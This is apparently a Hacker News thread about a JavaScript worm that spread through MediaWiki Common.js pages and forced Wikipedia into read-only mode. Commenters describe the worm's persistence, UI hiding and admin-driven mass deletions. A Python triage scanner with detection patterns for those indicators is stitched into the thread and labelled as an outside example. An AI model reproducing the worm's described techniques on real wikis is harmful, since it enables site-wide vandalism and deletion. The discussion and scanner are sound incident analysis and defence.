Wikipedia in read-only mode following mass admin account compromise

https://www.wikimediastatus.net
274•greyface-•1h ago

Comments

greyface-•1h ago
Additional context:

https://wikipediocracy.com/forum/viewtopic.php?f=8&t=14555

https://en.wikipedia.org/wiki/Wikipedia:Village_pump_(techni...

https://old.reddit.com/r/wikipedia/comments/1rllcdg/megathre...

Apparent JS worm payload: https://ru.wikipedia.org/w/index.php?title=%D0%A3%D1%87%D0%B...

tantalor•1h ago
Nice to see jQuery still getting used :)
nzeid•52m ago
Wikipediocracy link gives "not authorized".
tantalor•1h ago
"Закрываем проект" is Russian for "Closing the project"
varun_ch•1h ago
Woah this looks like an old school XSS worm https://meta.wikimedia.org/wiki/Special:RecentChanges?hidebo...

I’ve always thought the fact that MediaWiki sometimes lets editors embed JavaScript could be dangerous.

varun_ch•57m ago
I’m also surprised an XSS attack like this hasn’t yet been actually used to harvest credentials like passwords through browser autofill[0].

It seems like the worm code/the replicated code only really attacks stuff on site. But leaking credentials (and obviously people reuse passwords across sites) could be sooo much worse.

[0] https://varun.ch/posts/autofill/

af78•40m ago
Time to add 2FA...
stephbook•3m ago
Chrome doesn't actually autofill before you interact. It only displays what it would fill in at the same location visually.
256_•56m ago
Here before someone says that it's because MediaWiki is written in PHP.
Dwedit•54m ago
PHP is the language where "return flase" causes it to return true.

https://danielc7.medium.com/remote-code-execution-gaining-do...

m4tthumphrey•51m ago
Also the language that runs half of the web.

Also the language that has made me millions over my career with no degree.

Also the language that allows people to be up and running in seconds (with or without AI).

I could go on.

jjice•48m ago
PHP is a fine language. It started my career. That said, it has a lot of baggage that can let you shoot yourself in the foot. Modern PHP is pretty awesome though.
radium3d•31m ago
Pretty sure we've seen people coding in essentially every other programming language also shoot themselves in the foot.
theamk•42m ago
Yep, that's the sad truth: a language's popularity often has nothing to do with its security properties. People will happily keep churning out insecure junk as long as it makes them millions, botnets and data compromises be damned.
ChrisMarshallNY•38m ago
I use it on the backends of my stuff.

Works great, but, like any tool, usage matters.

People who use tools badly, get bad results.

I've always found the "Fishtank Graph" to be relevant: https://w3techs.com/technologies/history_overview/programmin...

onion2k•36m ago
Also the language that runs half of the web.

The bottom half.

;)

ramon156•34m ago
The language is not what makes you nor the product. You could've written the same thing in RoR. PHP was just first, and that's why it still exists.
stackghost•22m ago
PHP performance is significantly better than Ruby on Rails, which I think plays a part in its continued popularity.
radium3d•33m ago
PHP is insanely great, and very fast. The hate has no clout.
dspillett•30m ago
> Also the language that has made me millions over my career with no degree.

Well done.

> Also the language that allows people to be up and running in seconds (with or without AI).

People getting up and running without any opportunity to be taught about security concerns (even those as simple as the risks of inadequate input verification), especially considering the infamous inconsistency in PHP's APIs which can lead to significant foot-guns, is both a blessing and a curse… Essentially a precursor to some of the crap that is starting to be published now via vibe-coding with little understanding.

cwillu•15m ago
Try not to take criticisms of tools personally. Phillips head screws are shit for a great many applications, while simultaneously being involved in billions of dollars of economic activity, and being a driver that everyone has available.
jasonjayr•7m ago
Perl still runs the other half?
420official•43m ago
FWIW this was fixed in 2020
dspillett•22m ago
I've not used PHP in anger in well over a decade, but if the general environment out there is anything like it was back then, there are likely a lot of people, mostly on cheap shared hosting arrangements, running PHP versions older than that and for the most part knowing no better.

That isn't the fault of the language of course, but a valid reason for some of the “ick” reaction some get when it is mentioned.

ale42•30m ago
Except that in a contemporary PHP that doesn't work any more.

  PHP Warning:  Uncaught Error: Undefined constant "flase" in php shell code:1
This means game over, the script stops there.
nhubbard•46m ago
Wow. This worm is fascinating. It seems to do the following:

- Inject itself into the MediaWiki:Common.js page to persist globally, and into the User:Common.js page to do the same as a fallback

- Uses jQuery to hide UI elements that would reveal the infection

- Vandalizes 20 random articles with a 5000px wide image and another XSS script from basemetrika.ru

- If an admin is infected, it will use the Special:Nuke page to delete 3 random articles from the global namespace, AND use the Special:Random with action=delete to delete another 20 random articles

EDIT! The Special:Nuke is really weird. It gets a default list of articles to nuke from the search field, which could be any group of articles, and rubber-stamps nuking them. It does this three times in a row.
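
A defender-side way to use the behaviours listed above, as an added example that is not from this thread or from MediaWiki: a triage heuristic that scores revisions of site/user JavaScript pages against those indicators (persistence in Common.js pages, jQuery hiding of UI, Special:Nuke, action=delete, external script loads). The revision records, the trusted-host list and the sample contents are constructed for the example; fetching real revisions from the MediaWiki API is assumed and not shown.

```python
import re

# Hosts a wiki's own site JS may legitimately load from (assumption for this example).
TRUSTED_HOSTS = ("wikimedia.org", "wikipedia.org")

# Indicators taken from the worm description in the thread: (label, regex).
INDICATORS = [
    ("edits-site-js", re.compile(r"MediaWiki:Common\.js|User:[^'\"\s]+/common\.js", re.I)),
    ("hides-ui",      re.compile(r"\$\(\s*['\"][#.][^'\"]*['\"]\s*\)\s*\.hide\(", re.I)),
    ("special-nuke",  re.compile(r"Special:Nuke", re.I)),
    ("mass-delete",   re.compile(r"action=delete", re.I)),
    ("huge-image",    re.compile(r"\b\d{4,}px\b", re.I)),
]
# Script-loading calls followed by an absolute URL; group 2 is the URL.
EXTERNAL_LOAD_RE = re.compile(
    r"(mw\.loader\.load|\$\.getScript|importScriptURI|\.src\s*=)\s*\(?\s*['\"]?(https?://[^'\")\s]+)", re.I)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

def is_trusted(host):
    # Exact match or a proper subdomain; a plain suffix test would accept evilwikipedia.org.
    return any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS)

def external_hosts(source):
    """Hosts referenced by script-loading calls that are not on the trusted list."""
    hosts = set()
    for m in EXTERNAL_LOAD_RE.finditer(source):
        host = HOST_RE.match(m.group(2)).group(1).lower()
        if not is_trusted(host):
            hosts.add(host)
    return sorted(hosts)

def scan_site_js(source):
    """Return the indicator labels matched by one revision's content, in table order."""
    hits = [label for label, rx in INDICATORS if rx.search(source)]
    if external_hosts(source):
        hits.append("external-script-load")
    return hits

def triage_revisions(revisions, min_hits=2):
    """Flag revisions matching at least min_hits indicators, most suspicious first."""
    flagged = []
    for rev in revisions:
        hits = scan_site_js(rev["content"])
        if len(hits) >= min_hits:
            flagged.append({"revid": rev["revid"], "user": rev["user"], "hits": hits,
                            "external_hosts": external_hosts(rev["content"])})
    return sorted(flagged, key=lambda r: -len(r["hits"]))

# Constructed sample revisions (not real Wikipedia data): one benign gadget load,
# two fragments shaped like the behaviours described in the thread.
SAMPLE_REVISIONS = [
    {"revid": 1, "user": "Gadgeteer", "content": "mw.loader.load('https://en.wikipedia.org/w/load.php?modules=ext.gadget.foo');"},
    {"revid": 2, "user": "AcctA", "content": "$('#ca-history').hide();\n$.getScript('https://bad.example/w.js');\nlocation='/wiki/Special:Nuke';"},
    {"revid": 3, "user": "AcctB", "content": "title:'MediaWiki:Common.js'\n'/w/index.php?title=Special:Random&action=delete'\nimg.style.width='5000px';"},
]
```

The `min_hits` threshold keeps a lone legitimate `.hide()` in a gadget from being flagged; tune it and the trusted-host list to the wiki being audited.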

256_•43m ago
As someone on the Wikipediocracy forums pointed out, basemetrika.ru does not exist. I get an NXDomain response trying to resolve it. The plot thickens.
pKropotkin•39m ago
Yeah, basemetrika.ru is free now. Should we occupy it? ;)
256_•35m ago
I'm half-tempted to try and claim it myself for fun and profit, but I think I'll leave it for someone else.

What should we put there, anyway?

gchamonlive•32m ago
I'd log requests and echo them back in the page
gibsonsmog•30m ago
Go old school and have the script inject the "how did this get here im not good with computers" cat onto random pages
speedgoose•25m ago
A JavaScript call to window.alert to pause the JavaScript VM.
Barbing•5m ago
Namecheap won’t sell it which is great because it made me pause and wonder whether it's legal for an American to send Russians money for a TLD.
amiga386•5m ago
It means giving money to the Russian government, so no.

If anyone from the Russian government is reading this, get the fuck out of Ukraine. Thank you.

dheera•35m ago
Wouldn't be surprised if elaborate worms like this are AI-designed
nhubbard•34m ago
I wouldn't be surprised either. But the original formatting of the worm makes me think it was human written, or maybe AI assisted, but not 100% AI. It has a lot of unusual stylistic choices that I don't believe an AI would intentionally output.
integralid•5m ago
I would. AI designed software in general does not include novel ideas. And this is the kind of novel software AI is not great at, because there's not much training data.

Of course it's very possible someone wrote it with AI help. But almost no chance it was designed by AI.

bawolff•10m ago
> Vandalizes 20 random articles with a 5000px wide image and another XSS script from basemetrika.ru

Note that while this looks like it's trying to trigger an XSS, what it's doing is ineffective, so basemetrika.ru would never get loaded (even ignoring that the domain doesn't exist).

epicprogrammer•43m ago
This is basically a weaponized, highly destructive version of the old MySpace Samy worm. Hitting MediaWiki:Common.js is the absolute nightmare scenario for MediaWiki deployments because that script gets executed by literally every single visitor and editor across the entire site, creating a massive, instant propagation loop. The fact that it specifically targets admins and then uses jQuery to blind them by hiding the UI elements while it silently triggers Special:Nuke in the background is incredibly insidious. It really exposes the foundational danger of legacy web architectures that still allow executable JavaScript to be stored and served directly from user-editable namespaces. Cleaning this up is going to be an absolute forensic nightmare for the Wikimedia team since the database history itself is the active distribution vector.
devmor•38m ago
In the early 2010’s I worked for a company whose primary income was subscriptions to site protection services - one of which included cleaning up malware-infected Wordpress installations. I worked on the team that did this job.

This exact type of database-stored executable javascript was one of the most annoying types of infections to clean up.

0xWTF•31m ago
Ok, so there are tons of mediawiki installations all over the internet. What do these operators do? Set their wikis to read-only mode, hang tight, and wait for a security patch?

Also, does this worm have a name?

bawolff•26m ago
There is nothing to do, the incident was not caused by a vulnerability in mediawiki.

Basically, someone who had permissions to alter site JS accidentally added malicious JS. The main solution is to be very careful about giving user accounts permission to edit JS.

[There are of course other hardening things that maybe should be done based on lessons learned]

streetfighter64•5m ago
Well, admins (or anybody other than the developers / deployment pipeline) having permissions to alter the JS sounds like a significant vulnerability. Maybe it wasn't in the early 2000s, but unencrypted HTTP was also normal then.
j45•25m ago
Too much app logic in the client side (Javascript) has always been an attack vector. The more that can reasonably be server side, the more that can't be seen.
quantum_magpie•5m ago
Could you point to where you found the details of the exploit? It’s not in the linked page. Really interested.
pixl97•2m ago
>Cleaning this up

Find the first instance and reset to the backup before then. An hour, a day, a week? Doesn't matter that much in this case.

Uhhrrr•39m ago
How do they know? Has this been published in a Reliable Source?
nhubbard•30m ago
This is the official Wikimedia Foundation status page for the whole of Wikipedia, so it's a reliable primary source.
vova_hn2•4m ago
Actually, usage of primary sources is kinda complicated [0], generally Wikipedia prefers secondary and tertiary sources.

[0] https://en.wikipedia.org/wiki/Wikipedia:No_original_research...

0xWTF•34m ago
Looking forward to the postmortem...
Wikipedianon•33m ago
This was only a matter of time.

The Wikipedia community takes a cavalier attitude towards security. Any user with "interface administrator" status can change global JavaScript or CSS for all users on a given Wiki with no review. They added mandatory 2FA only a few years ago...

Prior to this, any admin had that ability until it was taken away due to English Wikipedia admins reverting Wikimedia changes to site presentation (Mediaviewer).

But that's not all. Most "power users" and admins install "user scripts", which are unsandboxed JavaScript/CSS gadgets that can completely change the operation of the site. Those user scripts are often maintained by long-abandoned user accounts with no 2-factor authentication.

Based on the fact user scripts are globally disabled now I'm guessing this was a vector.

The Wikimedia foundation knows this is a security nightmare. I've certainly complained about this when I was an editor.

But most editors that use the website are not professional developers and view attempts to lock down scripting as a power grab by the Wikimedia Foundation.

256_•26m ago
Maybe somewhat unrelated, but I'm reminded of the fact that people have deleted the main page on a few occasions: https://en.wikipedia.org/wiki/Wikipedia:Don%27t_delete_the_m...
chris_wot•13m ago
Most admins on Wikipedia are incompetent.
skrtskrt•30m ago
Long past time to eliminate JavaScript from existence
dgxyz•14m ago
This.

Actually fuck the whole dynamic web. Just give us hypertext again and build native apps.

Edit: perhaps I shouldn't say this on a VC-driven SaaS wankfest forum...

nixass•29m ago
I can edit it
j45•27m ago
It's reassuring to know Wikipedia has these kinds of security mechanisms in place.
lifeisstillgood•21m ago
I completely understand marking the software that controls drinking water as critical infrastructure, but at some point a state-based cyber attack that just wipes Wikipedia off the net is deeply damaging to our modern society’s ability to agree on common facts …

Just now thought “if Wikipedia vanished, what would it mean …” and it’s not on the level of safe drinking water, but it is a level.

Aperocky•10m ago
All persistent data should have backup.

It's not a high bar.

lyu07282•6m ago
There are so many mirrors anyway and trivial to get a local copy? What is much more concerning is government censorship and age verification/digital id laws where what articles you read becomes part of your government record the police sees when they pull you over.
garbagecreator•20m ago
Another reason to make the default disabling JS on all websites, and the website should offer a service without JS, especially those implemented in obsolete garbage tech. If it's not an XSS from a famous website, it will be an exploit from a sketchy website.
wikiperson26•20m ago
A theory on phab: "Some investigation was made in Russian Wikipedia discord chat, maybe it will be useful.

1. In 2023, vandal attacks were made against two Russian-language alternative wiki projects, Wikireality and Cyclopedia. Here https://wikireality.ru/wiki/РАОрг is an article about the organisers of these attacks.

2. In 2024, ruwiki user Ololoshka562 created a page https://ru.wikipedia.org/wiki/user:Ololoshka562/test.js containing the script used in these attacks. It was inactive for the next 1.5 years.

3. Today, sbassett massively loaded other users' scripts into his global.js on meta, maybe for testing global API limits: https://meta.wikimedia.org/wiki/Special:Contributions/SBasse... . In one edit, he loaded Ololoshka's script: https://meta.wikimedia.org/w/index.php?diff=prev&oldid=30167... and ran it."
